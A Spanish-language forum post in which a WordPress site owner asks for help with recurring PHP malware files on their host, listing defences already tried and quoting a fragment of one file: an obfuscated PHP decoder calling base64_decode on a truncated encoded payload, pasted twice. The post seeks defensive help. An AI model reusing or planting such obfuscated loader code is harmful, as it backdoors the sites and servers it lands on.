Tengo una web Wordpress en el hosting Arsys. El soporte técnico me avisa continuamente de nuevos archivos .php macados como malware y no sé que hacer para que dejen de aparecer.
- He instalado el ithemes security en wordpress
- He cambiado los permisos de lectura de archivo a las recomendaciones del plugin ithemes security
- He cambiado todas las contraseñas (ftp, cpanel, wordpress...)
- He añadido en el htaccess la lista de HackRepair.com Blacklist
Son archivos php de unos 150Kb con funciones php
Este es un fragmento:
Cita:
gracias function kjfttvs($xnxfr, $ckdljgklm){$fmycpezf = ''; for($i=0; $i < strlen($xnxfr); $i++){$fmycpezf .= isset($ckdljgklm[$xnxfr[$i]]) ? $ckdljgklm[$xnxfr[$i]] : $xnxfr[$i];}
$ayichn="base64_decode";return $ayichn($fmycpezf);}
$ziguwcw = '9VfwW6vYBz9oek6AsXvAzkb8BAspiGm6tGNdgNdcW1mdzT3fj ZUxnVvxzk6AsXvA'.
'sAspiKcdgNdcW1mdzT3fjZUxn15Dzk6DB13ajVf8nfvlW1afe ANUFZEhZEPYBzHQj'.
'VfLB6vpW1adjZUNMtpMZXfXMVfYsk6lMZHQ0l6C6E6CMCEM7N oee5vtH6e1H6eneaPi05vtH0bVealUICcO'.
'RAihicoee5vtH6e1H6eneae5t0v0H6vPHGHCealUICcOFtiTR 4cwFZDbi4pMZ1fXMZ5fnzPl'.
'7CUEza350fB50fpxC5H005vrzlBI0fjP0EH5H5
$ayichn="base64_decode";return $ayichn($fmycpezf);}
$ziguwcw = '9VfwW6vYBz9oek6AsXvAzkb8BAspiGm6tGNdgNdcW1mdzT3fj ZUxnVvxzk6AsXvA'.
'sAspiKcdgNdcW1mdzT3fjZUxn15Dzk6DB13ajVf8nfvlW1afe ANUFZEhZEPYBzHQj'.
'VfLB6vpW1adjZUNMtpMZXfXMVfYsk6lMZHQ0l6C6E6CMCEM7N oee5vtH6e1H6eneaPi05vtH0bVealUICcO'.
'RAihicoee5vtH6e1H6eneae5t0v0H6vPHGHCealUICcOFtiTR 4cwFZDbi4pMZ1fXMZ5fnzPl'.
'7CUEza350fB50fpxC5H005vrzlBI0fjP0EH5H5
